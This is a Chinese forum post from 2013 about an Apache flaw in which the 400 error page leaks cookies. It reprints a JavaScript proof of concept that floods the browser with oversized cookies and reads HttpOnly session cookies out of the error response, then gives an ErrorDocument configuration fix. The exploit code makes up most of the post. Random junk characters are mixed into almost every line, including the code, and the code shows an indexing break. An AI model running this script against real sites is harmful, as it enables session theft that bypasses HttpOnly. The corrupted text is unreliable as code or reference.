很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。# g: r; e* _! W! ]+ G/ e% e
9 J; F/ h: A& I- y( b. Q, M
用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:
& Q/ V% @4 A+ Q( G+ O
! [/ X& [( ]3 u: o+ A- J$ I. |- ^, y" M9 P0 Q
// http://www.exploit-db.com/exploits/18442/
8 u3 h# N7 y% I6 o" x, c" efunction setCookies (good) {* C1 Q7 v2 S& U" j! h, l+ ?+ t
// Construct string for cookie value
1 I7 {3 [! p; u/ E# }6 U' qvar str = "";
- _1 o4 P+ |' N* B5 Y3 sfor (var i=0; i< 819; i++) {
, ?, o: n3 X8 O5 h) c2 Pstr += "x";. r2 p7 Z* \6 D1 e' T/ |+ N5 Y$ m4 g* Z0 Z
}0 v F T( i, R/ D' L* V) ]
// Set cookies# h9 r6 }2 Q( w* d# Q+ R. u) J+ o- d: B
for (i = 0; i < 10; i++) {, O+ u7 w/ [6 o; ]# e
// Expire evil cookie
7 c+ C$ U% j, Xif (good) {! }9 v8 d9 X1 G4 t# }+ c6 e5 Y; j
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";, r& {2 F/ a4 I7 e$ |7 c
}
' [* R: y) P% l9 p" _// Set evil cookie, \* T# Q2 W; [
else {! E) Q$ ^" b4 U0 B; r* P$ Z, H4 ~8 _
var cookie = "xss"+i+"="+str+";path=/";. ~- O: I' ~4 e* }" B7 F
}
3 a; e3 l( W2 J& ~3 k3 S$ }/ [document.cookie = cookie;
4 q9 S9 ^% l; B2 x/ m R- X+ L}
" V" U% ?2 C& ?* r}0 }4 Z/ u* y6 R2 K# R: }
function makeRequest() {3 Y0 V) `; A/ T
setCookies();
! B+ P- F1 g% N, l5 afunction parseCookies () {
$ A( |" }5 [2 Q$ Qvar cookie_dict = {};& i: T: C0 k' C; z/ a6 a2 Z
// Only react on 400 status
5 E% d( t. ~1 ]" Y/ A& Xif (xhr.readyState === 4 && xhr.status === 400) {
0 B( J+ Z' [9 Q+ ^4 X// Replace newlines and match <pre> content8 u3 P' T6 Q( ^0 N- O
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);/ P& e; e2 A2 }6 ^7 \6 A7 h; h% c" A# R
if (content.length) {
8 U$ t5 o9 p1 w- H; |( V0 g// Remove Cookie: prefix9 P% ~( P( [! l u
content = content[1].replace("Cookie: ", "");
7 F# F! i, T( z$ h& c' Bvar cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);* @$ ?/ n! ?/ y; M6 A
// Add cookies to object, v! S6 {$ p+ v8 j% m3 s
for (var i=0; i<cookies.length; i++) {
1 B$ _. z# q( z6 G5 I, Tvar s_c = cookies.split('=',2);
1 p, }8 w, y0 O" hcookie_dict[s_c[0]] = s_c[1];. i5 U: N' j% I! V$ d0 `( I/ @
}
, O6 M& @; L9 `9 R- C' S}, [% i- a6 e- I: L9 U$ A
// Unset malicious cookies. D; f o8 d+ n7 {
setCookies(true);$ x) K3 t* N7 j% A/ Q4 {+ H
alert(JSON.stringify(cookie_dict));( K, S9 ?5 o4 m" n5 a5 i; _
}
1 y5 u, ]! p# r9 ~% j+ @}: v' p- q) B! l$ F6 q+ T
// Make XHR request. ^7 o" Y1 d& y& y2 S6 n0 w
var xhr = new XMLHttpRequest(); H6 j( b( `0 G* J
xhr.onreadystatechange = parseCookies;4 U5 ?" B1 P! u8 A* u7 `+ u" n
xhr.open("GET", "/", true);) ~* X% B; |( G' ^$ E2 D. i
xhr.send(null);9 d+ g, Q# N, F! q
}% m7 j8 K j1 v0 r: l
makeRequest();
l) l# G/ K' G9 {+ d4 s4 J J& i6 o
你就能看见华丽丽的400错误包含着cookie信息。
+ o( {! w& S. m0 }) w
, s- u/ M7 a; `8 L下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#6 b. E+ I4 B, s! m6 a
) P' S+ T6 {' E4 b J$ V! a修复方案:1 Y% W: t' j) s0 r* w$ _
9 d6 W% T- N: g3 T0 T6 s O* m) C
Apache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下
( b& ?- ?5 [! s. @# i+ r) d/ S' q+ K' @8 p. f+ I
In the event of a problem or error, Apachecan be configured to do one of four things,; Y* e9 {( q% I/ A5 v
6 c S2 |$ m, R6 m8 r
1. output asimple hardcoded error message输出一个简单生硬的错误代码信息
. k) l1 F/ Z( p( {: s2. output acustomized message输出一段信息5 `: T3 l7 i: U7 t5 V* S: C
3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面
1 p5 a+ v" b( b, y$ r( d4. redirect to an external URL to handle theproblem/error转向一个外部URL, ]4 g6 }1 D3 k# d3 z$ K
* x- M2 z1 }/ L- f' I. Y7 K; Z
经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容/ g; G. U* ^9 d0 R8 ^
$ ^# y3 V/ ~, \8 F% u* I% nApache配置:& Q a2 p6 c' b( }/ \# g. E; e
" l1 H* S# L0 S1 t( R4 s
ErrorDocument400 " security test"
2 ]0 c/ F2 f6 r; K5 Y* D3 k0 N
l5 O& A' {* v e$ O0 ^当然,升级apache到最新也可:)。
. O& f2 [8 ]: _( f2 K2 u
; ~( ~0 ?% m& h& I/ c# I6 [参考:http://httpd.apache.org/security/vulnerabilities_22.html6 D ?6 v& `7 B$ _) u/ C# I
% ` h$ D+ L/ m3 U0 H) b2 X
|
发表于 2013-4-19 19:15:43
收藏
支持
反对